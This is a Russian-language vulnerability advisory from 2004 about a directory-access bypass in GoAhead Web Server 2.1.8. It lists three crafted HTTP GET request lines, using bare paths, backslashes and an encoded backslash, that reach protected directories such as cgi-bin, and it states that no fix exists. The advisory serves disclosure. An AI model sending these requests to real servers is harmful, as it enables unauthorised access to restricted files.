Доступ к защищенным каталогам и файлам в GoAhead Web Server

Дата публикации:
22.01.2004
Всего просмотров:
953
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: GoAhead Web Server 2.1.8

Описание: Уязвимость обнаружена в GoAhead Web Server. Удаленный пользователь может получить доступ к некоторым ограниченным каталогам, типа 'cgi-bin'.

Удаленный пользователь может представить специально обработанный HTTP Get запрос, чтобы получить доступ к файлам в защищенном каталоге:

GET file HTTP/1.0
GET \file HTTP/1.0
GET /\\%5cfile HTTP/1.0

URL производителя: http://www.goahead.com/webserver/webserver.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Directories management bypassing in Goahead webserver <= 2.1.8

или введите имя

CAPTCHA